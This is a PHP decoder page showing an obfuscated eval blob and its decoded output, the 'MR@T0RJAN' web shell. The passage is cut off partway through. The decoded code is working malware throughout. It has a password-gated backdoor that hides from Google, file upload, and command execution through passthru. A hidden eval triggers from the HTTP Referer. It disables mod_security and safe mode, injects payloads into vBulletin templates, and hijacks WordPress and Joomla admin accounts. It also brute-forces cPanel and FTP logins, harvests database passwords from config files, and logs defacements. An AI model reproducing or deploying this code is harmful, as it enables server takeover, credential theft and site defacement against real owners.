Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(str_rot13(base64_decode('a5wUm8eOq9oWUj/nHYkGmFmTnGam83GSyTl//aX6..
Decoded Output download
/*
MR@T0RJAN
*/
$auth_pass = "24321be2d2b28aa0d382a55322824a4b";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<div align="center">
<strong><span style="font-family: Time New Romain;"><span style="font-size: 20px;"><font face ="impact" class="hk" size="7" style="text-shadow: 0px 0px 25px rgb(30, 75, 30);"><span style="color: rgb(75, 75, 75);">--=[ MR@T0RJAN ]=--</span></font></span></span></strong></p>
<br />
<title>MR@T0RJAN</title>
<style>
a:hover{ border-bottom:1px solid #4C83AF;}
input {background:#303030;color:#9b9592;fon t-family:Verdana,Arial;font-size:20px;vertical-align:middle; height:30; border-left:2px solid #f72f0e; border-right:2px solid #f72f0e; border-bottom:2px solid #f72f0e; border-top:1px solid #f72f0e;}
</style>
<center>
<strong><span style="font-family: Time New Romain;"><span style="font-size: 10px;"><font face ="impact" class="hk" size="6" style="text-shadow: 0px 0px 25px rgb(21, 226, 53);"><span style="color: rgb(75, 75, 75);">Login Center</span></font></span></span></strong></p>
<br /><br /><br />
<form method=post>
<input type=password name=pass>
<INPUT value="login" name="send" type="submit">
</form></center>
<br /><br /><br /><br /><center><font face ="impact" class="hk" size="7" style="text-shadow: 1px 2px 20px rgb(209, 1, 25);">CODED BY MR@T0RJAN</font></center>
<br /><br /><br /><center><a href="[email protected]"><font face="arial" size="3" color="black"><b>Gaza Hacker Team © 2012<b></font></a></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
/*
MR@T0RJAN
*/
// the brain
$port= $_SERVER['SERVER_PORT'];
$browser= $_SERVER["HTTP_USER_AGENT"];
function softwareinfo()
{
echo getenv("SERVER_SOFTWARE");
}
$pwd = getcwd().DIRECTORY_SEPARATOR;
$y_ip = $_SERVER['REMOTE_ADDR'];
$s_ip = gethostbyname($_SERVER['HTTP_HOST']);
$user = get_current_user();
$system = php_uname();
if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $s_safemode = TRUE; else $s_safemode = FALSE;
if($s_safemode) $s_info = "<br /> safemode <span class=\"gaya\"><font face=\"arial\" color=\"red\"><b>ON</b></font></span>";
else $s_info = "safemode <span class=\"gaya\"><font face=\"Arial\" color=\"green\"><b>OFF</b></font></span>";
// the body
?>
<html>
<head>
<style>
input{background:#303030;color:#00FF00;fon t-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
select {background:#303030;color:#FFFFFF;fon t-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
table {BORDER-LEFT-COLOR: #000000; BORDER-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000}
body {text-shadow: 3px 3px 3px rgb(35, 75, 30);color:#828282;border-bottom:1px solid #4C83AF;}
textarea{background-color:#191919;color:white;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
a:hover{ border-bottom:1px solid #4C83AF;}
a:link {text-decoration: none;}
A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: black; background-color:#393939; text-decoration: overline underline; }
</style>
</head>
<?php
echo' ';echo '<html><head><title>MR@T0RJAN</title></head><body bgcolor="#000000">
<center><strong><span style="font-family: Time New Romain;"><span style="font-size: 20px;"><font face ="impact" class="hk" size="7" style="text-shadow: 0px 0px 10px rgb(21, 226, 53);"><span style="color: rgb(75, 75, 75);">--=[ MR@TO0RJAN ]=--</span></font></span></span></strong></center><br />
<a href=mailto:[email protected]><font face="verdana" color="white" size="2">by MR@T0RJAN</font></a> <a href=?id=about><font face="Century Gothic">About</font></a></span>
<center><table border="0"><td width="740" height="50">
<td style="width:10%;" colspan="3">Your ip <font color="#C0C0C0">'.$y_ip.'</font><br /><a href=""><font color="red">___________</font></a>
Server <br /><font color="#C0C0C0">'.$s_ip.'</font><br />
</td>
<td style="width:85%;" colspan="3">
<b><font face="arial">
Directory<font color="#C0C0C0"> '.$pwd.'</font><br />
'.$s_info.'<br />
ID <font color="green">'.$user.'</font><br />Info : <font color="white">'.$system.'</font>
<br />
</td>
<td BORDER-RIGHT-LEFT="red" style="width:15%;" colspan="3"><a href="http://'.$_SERVER["HTTP_HOST"].':'.$port.'" target="_blank"><font face="verdana" size="3" color="#c0c0c0">Server Port :</font> <font color="red">'.$port.'</font></a>
<br />
<a href=""><font face="verdana" size="3" color="#c0c0c0">http://'.$_SERVER["HTTP_HOST"].'</font></a>
</td><br />
</font></b></td></table></center>';
echo '</body></html>';
echo '<html><head></head><body link="#C0C0C0" vlink="#C0C0C0" alink="white">';
// the menu .. what do you want to eat ?
echo '<table border="0" bordercolor="#C0C0C0"><td height="20" width="900">';
echo'<b>[<span><a href=?id=file>Files</a>]</b></span> ';
echo'<b>[<span><a href=?id=up>upload File</a>]</b></span> ';
echo'<b>[<span><a href=?id=phpinfo>PHP Info</a>]</b></span> ';
echo'<b>[<span><a href=?id=safe>Safe mode shutdown</a>]</b></span> ';
echo'<b>[<span><a href=?id=vb>VB Index change</a>]</b></span></b> ';
echo'<b>[<span><a href=?id=wp>wordpress login change</a>]</span></b> ';
echo'<b>[<span><a href=?id=jo>joomla login change</a>]</span></b> ';
echo'<b>[<span><a href=?id=base64>Base64</a>]</b></span>';
echo'</td></table></body></html>';
echo'<br /><table border="0" bordercolor="#C0C0C0"><td width="900" height="20">
<b>[<span><a href=?id=cpanel>Cpanel + FTP crack</a>]</span></b>
<b>[<span><a href=?id=domains>Domains + Users</a>]</span></b>
<b>[<span><a href=?id=zone>Zone-H Tool</a>]</span></b>
<b>[<span><a href=?id=config>Config Finder</a>]</span>
<b>[<span><a href=?id=wp-index>wp index change</a>]</span>
<b>[<span><a href=?id=md5>MD5 Crypter</a>]</span>
<b>[<span><a href=?id=spam>Mailer</a>]</span>
</td></table>';
// switch
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
$k2 = $_GET["id"];
switch($k2){
case "up";
echo '<br /><br />';
echo '<center><font face="impact" size="5" color="green">-== [ The uploader ] ==-</center><br />';
echo '<font face="Arial" color="red" size="2">The File Will Be uploaded To:</font><font color="white" face="arial" size="2"> '.$pwd.'</font><br /><br />';
echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="ReZk2ll" type="submit" id="ReZk2ll" value="Upload"></form></center>';
if( $_POST['ReZk2ll'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b><center><font face="arial" size="3">upload complete success √</font></center></b><br><br>'; }
else { echo '<b><center><font face="arial" size="3" color="red">Failed to upload File !!! if file name is arabic pleaz change it :)</font></b><br><br>'; }
}
break;
case "phpinfo";
ob_start();
eval("phpinfo();");
$b = ob_get_contents();
ob_end_clean();
$a = strpos($b,"<body>")+6;
$z = strpos($b,"</body>");
$p = "<div class=\"phpinfo\">".substr($b,$a,$z-$a)."</div>";
echo ('<br /><center>'.$p.'</center>');
case "about";
echo '<br /><br /><center><font face="verdana" size="5" color="#626262"> This Tool was maded by MR@T0RJAN</font></center>';
echo '<br /><center><b><font face="verdana" color="#C0C0C0">[email protected]</font></b></center><br />
<center><font face="Century Gothic" size="4" color="#cecece">MR@T0RJAN was Made to make hackers life easyer</center>
<br />
<center>ThaNks ToO : MR@T0RJAN - b0y h4ck3r - llord - Hamdix - Abath - MR.TOPS - D3ATH H4CK3R - Foxy - Casper - TKL</center>
<br />
<center>Visit our Website: <a href="http://Gaza-Hacker.net" target="_blank">Gaza Hacker Team</a></center>
<br />
<center>or view our <a href="http://www.zone-h.org/archive/notifier=Gaza Hacker Team" target="_blank">zone-h</a></center>
<br />
</font>
';
echo '<center><font face="verdana" color="#cecece">All rights reserved to MR@T0RJAN © 2012</font></center>';
break;
case "file";
echo '<br />';
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}
closedir($hr);}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=get>';
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
echo '<center><table border="0" bordercolor="red"><td width="500" height="500" bordercolor="black"><textarea cols=60 rows=25>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea></td></table>'.$form;
break;
case "safe";
mkdir('safemode', 0755);
chdir('safemode');
$htaccess = ".htaccess";
$add = "$htaccess";
$est = fopen ($add , 'w') or die ("Damn ERROR");
$con = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
fwrite ( $est , $con ) ;
fclose ($est);
$phpini = "php.ini";
$add2 = "$phpini";
$est = fopen ($add2 , 'w') or die ("ERROR");
$cont = "safe_mode = Off ";
fwrite ( $est , $cont ) ;
fclose ($est);
$add2 = "ini.php";
$est = fopen ($add2 , 'w') or die ("ERROR");
$cont = '<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?> ';
fwrite ( $est , $cont ) ;
fclose ($est);
echo '<br /><br /><center><font face="verdana" color="white">Creating .htaccess File .... Done !<br />Creating php.ini File ... Done !<br />Creating ini.php File ... Done !<br />check The safe mode :))</font></center>';
echo "<script>alert('The Files are in safemode folder')</script>";
break;
case "vb";
echo "<br />";
echo "<center>";
if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"50\" rows=\"20\">code source of your index</textarea><br>
<INPUT value=\"change index\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());
if($ok){
echo '<center><font face="impact" color="white">Good .. index changed </font></center><br><br>';
}
}
echo '</center>';
break;
case "wp";
echo '<center><br />';
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"****\">
database : <INPUT size=\"15\" value=\"Database\" name=\"database\" type=\"****\">
username : <INPUT size=\"15\" value=\"Username\" name=\"username\" type=\"****\">
password : <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\">
<br /><br />
New username : <INPUT name=\"admin\" size=\"15\" value=\"admin\">
New password : <INPUT name=\"pwd\" size=\"15\" value=\"admin\">
<br />
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
if($a4s){
echo '<b><center><font face="impact" color="green" size="3">OK .. all right go and login</center></b>';
}
}
echo '<center>';
break;
case "jo";
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
<br /><br /><br />
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\">
username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\">
<br /> <br />
New Username: <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br />
New Password: Use MD5 Hash only,or use this and the new pass will be 123456 <INPUT name=\"pwd\" size=\"45\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>
<br />
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
if($SQL){
echo "<b><center><font face=\"impact\" color=\"white\" size=\"3\">Good .. all right now login</center></font></b> ";
}
}
break;
case "cpanel";
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){
$target = "localhost";
}
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>Cpanel + FTP Cracker</title>
<body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000">
<div align="center">
<form method="POST" style="border: 1px solid #000000">
<table width="67%" style="border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0">
<tr><td align=center>
<b>
<font face="Century Gothic" size=4 color=#00FF00>Cpanel + FTP Cracker</font></b><font color="#00FF00">
</font><br /><BR />
<center><font face="Century Gothic" size="3" color="red"><b>please use Firefox or Opera</b></font></center>
</td></tr>
</table>
<br />
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
<font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
Please Check The Target Hostname .</font></font></b></p>";exit;}
elseif ( curl_errno($ch) == 0 ){
print "<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'><tr><td align=center><b><font face=\"Tahoma\" color=\"#FF0000\">[+]</font><font>
Cracking Success With Username (</font><font color=\"#FF0000\">$user</font><font>) and Password (</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">)</font></b></td></tr></table>";}curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
<font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
Please Check The Target Hostname .</font></font></b></p>";exit;}
elseif ( curl_errno($ch) == 0 ){
print "<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'><tr><td align=center><b><font face=\"Tahoma\" color=\"#FF0000\">[+]</font><font>
Cracking Success With Username (</font><font color=\"#FF0000\">$user</font><font>) and Password (</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">)</font></b></td></tr></table>";}curl_close($ch);}
if(isset($submit) && !empty($submit)){
if(empty($users) && empty($pass)){ print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
if(empty($pass) ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
$userlist=explode("
",$users);
$passlist=explode("
",$pass);
print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\">
Cracking Process Started, Please Wait ...</font></b><br><br>";
foreach ($userlist as $user) {
$pureuser = trim($user);
foreach ($passlist as $password ) {
$purepass = trim($password);
if($cracktype == "ftp"){
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpanel")
{
cpanel_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}
}
echo "<form method=POST action=''><table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr>
<td> <br />
<p align='center'><b><font color='#FF0000'>
<span lang='en-us'>Server's IP</span> :</font><font face='Arial'>
</font><font face='Arial' color='#CC0000'>
<input type='text' name='target' size='16' value=$target style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'></font></b></p>
<p align='center'><b><font color='#008000' face='Tahoma' size='2'> </font></b></p>
<div align='center'>
<table width='55%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr>
<td align='center'>
<span lang='en-us'><font color='#FF0000'><b>Username</b></font></span></td>
<td>
<p align='center'>
<span lang='en-us'><font color='#FF0000'><b>Password</b></font></span></td>
</tr>
</table>
<p align='center'> <textarea rows='20' name='users' cols='25' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>";
system('ls /var/mail');
echo "</textarea><textarea rows='20' name='passwords' cols='25' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>123123
123456
1234567
12345678
123456789
159159
112233
332211
1478963
1478963.
cpanel
password
user
passwd
passwords
159357
357951
114477
pass
Password</textarea><br>
<br>
<b> <font font color='#FF0000'>
Guess options</font></b><font style='font-size: 12pt;' size='-3' face='Verdana'><span style='font-size: 9pt;'>
<font face='Tahoma'>
<input name='cracktype' value='cpanel' style='font-weight: 700;' checked type='radio'></font></span></font><b><font size='2' face='Tahoma'>
Cpanel</font><font size='2' color='#cc0000' face='Tahoma'>
</font><font size='2' color='#FFFFFF' face='Tahoma'>
(2082)</font></b><font size='2' face='Tahoma'><b> </b>
</font>
<font style='font-size: 12pt;' size='-3' face='Verdana'>
<span style='font-size: 9pt;'><font face='Tahoma'>
<input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></font></span></font><font style='font-weight: 700;' size='2' face='Tahoma'>
</font><span style='font-weight: 700;'>
<font size='2' face='Tahoma'>Ftp </font>
<font size='2' color='#FFFFFF' face='Tahoma'>
(21)</font></span></p><br />
<center><input type='submit' value='Crack it' name='submit'></center>
</td>
</tr>
</table>
<p align='center'></td>
</tr>
</form>
<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
<tr></tr>
</table>";
die();
echo '
<table width="67%" style="border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0">
<tr><td align=center>
<font color="#00FF00" face="Century Gothic">All Rights Reserved To Egyptian
Shell Team</font></td></tr>
</table>';
break;
case "domains";
echo "<p align=center><font face='impact' color='white'>Domains and Users</font></p>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b>Error : [ /etc/named.conf ] Forbidden "); }
echo '<table align="center" border="1" bordercolor="red">
<tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
}}}
break;
case "zone";
?>
<?php
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){
die('Curl Error');
}
?>
<html xmlns="http://www.w3.org/1999/xhtml">
<title>zone-h Tool MR@T0RJAN</title>
</head>
<?php
if($_POST) {
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
if ($hacker == "") {
die ("<center><br />Sorry there is an Error <center>");
}
elseif($method == "--------SELECT--------") {
die("<center>Error</center>");
}
elseif($neden == "--------SELECT--------") {
die("<center>Error</center>");
}
elseif($site == "") {
die("<center>Error</center>");
}
$i = 0;
$sites = explode("
", $site);
while($i < count($sites)) {
if(substr($sites[$i], 0, 4) != "http") {
$sites[$i] = "http://".$sites[$i];
}
poster("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
++$i;
}
echo "<center><p>Ok All right ... registred</p></center>";
}else{
echo '<center>
<form action="" method="post">
<div id="option">
<p><font face="arial" color="white"><b>Defacer Name</b></font><br />
<span class="ok"><input type="text" name="defacer" size="40" /></span> </p>
<p><font face="arial" color="white"><b>Hacking Mode</b></font><br /><select name="hackmode">
<option > --------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option
value="2" >undisclosed (new) vulnerability</option>
<option
value="3" >configuration / admin. mistake</option>
<option
value="4" >brute force attack</option>
<option
value="5" >social engineering</option>
<option
value="6" >Web Server intrusion</option>
<option
value="7" >Web Server external module intrusion</option>
<option
value="8" >Mail Server intrusion</option>
<option
value="9" >FTP Server intrusion</option>
<option
value="10" >SSH Server intrusion</option>
<option
value="11" >Telnet Server intrusion</option>
<option
value="12" >RPC Server intrusion</option>
<option
value="13" >Shares misconfiguration</option>
<option
value="14" >Other Server intrusion</option>
<option
value="15" >SQL Injection</option>
<option
value="16" >URL Poisoning</option>
<option
value="17" >File Inclusion</option>
<option
value="18" >Other Web Application bug</option>
<option
value="19" >Remote administrative panel access through bruteforcing</option>
<option
value="20" >Remote administrative panel access through password guessing</option>
<option
value="21" >Remote administrative panel access through social engineering</option>
<option
value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
<option
value="23" >Access credentials through Man In the Middle attack</option>
<option
value="24" >Remote service password guessing</option>
<option
value="25" >Remote service password bruteforce</option>
<option
value="26" >Rerouting after attacking the Firewall</option>
<option
value="27" >Rerouting after attacking the Router</option>
<option
value="28" >DNS attack through social engineering</option>
<option
value="29" >DNS attack through cache poisoning</option>
<option
value="30" >Not available</option>
</select></p>
<p><font face="arial" color="white"><b>Hacking Reason</b></font><br /><select name="reason">
<option > --------SELECT-------- </option>
<option
value="1" >Heh...just for fun!</option>
<option
value="2" >Revenge against that website</option>
<option
value="3" >Political reasons</option>
<option
value="4" >As a challenge</option>
<option
value="5" >I just want to be the best defacer</option>
<option
value="6" >Patriotism</option>
<option
value="7" >Not available</option>
</select> </p>
<p><font face="arial" color="#008000"><b>Sites</b></font><br />
<span class="fur"><font face="ARIAL" color="white"><b>Put domains dafeced URL here</b></span><br />
<span class=""><textarea name="domain" cols="43" rows="17"></textarea></span> </p>
<p><input type="submit" value="Register" />
</form>
<div class ="sub"><font face="impact" color="white">MR@T0RJAN</font></div>
<br>
</div>
</center>';
}
function poster($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
?>
<body>
</body>
</html>
<?php
break;
case "config";
echo "<html>";
echo "<title>MR@T0RJAN</title><body>";
set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo '<br /><br /><center><font face="arial" color="white" size="5"><b>[-] Error : Sorry I connot read /etc/passwd</b></font></center>';
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,":");
$username=substr($str,0,$pos);
$dirz="/home/$username/public_html/";
if (($username!="")) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories";
echo "[~] Searching for passwords in config.* files...";
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "
[+] Done";
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath="$path$file";
if (($file!='.') and ($file!='..')) {
if (is_readable($fpath)) {
$dr="$fpath/";
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
if ($pass!='') {
echo "[+] $fpath
$pass";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=fopen($link,'r');
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
if (strrpos($line,'"'))
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
else
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
return $pass;
}
}
}
function ftp_check($login,$pass) {
@$ftp=ftp_connect('127.0.0.1');
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo '[FTP] '.$login.':'.$pass." Success";
}
else ftp_quit($ftp);
}
}
echo "</textarea><br>";
echo "</body></html>";
break;
case "wp-index";
if($_POST['form_action'] == 1 )
{
$text=file_get_contents($_POST['file']);
$username=entre2v2($text,"define('DB_USER', '","');");
$password=entre2v2($text,"define('DB_PASSWORD', '","');");
$dbname=entre2v2($text,"define('DB_NAME', '","');");
$prefix=entre2v2($text,"$table_prefix = '","'");
}
if($_POST['form_action'] == 2 )
{
$prefix=($_POST['db_prefix']);
$username=($_POST['db_username']);
$password=($_POST['db_password']);
$dbname=($_POST['db_name']);
}
/*
echo($username);
echo("<br>");
echo($password);
echo("<br>");
echo($dbname);
echo("<br>");
echo($prefix);
echo("<br>");
*/
if ($_POST['form_action'])
{
$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
$link=mysql_connect("localhost",$username,$password) ;
if ($link) {
mysql_select_db($dbname,$link) ;
$req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;");
echo("<br>[+] Changing admin password to 123456789");
$req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo("<br>");
echo($data["option_value"]);
}
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
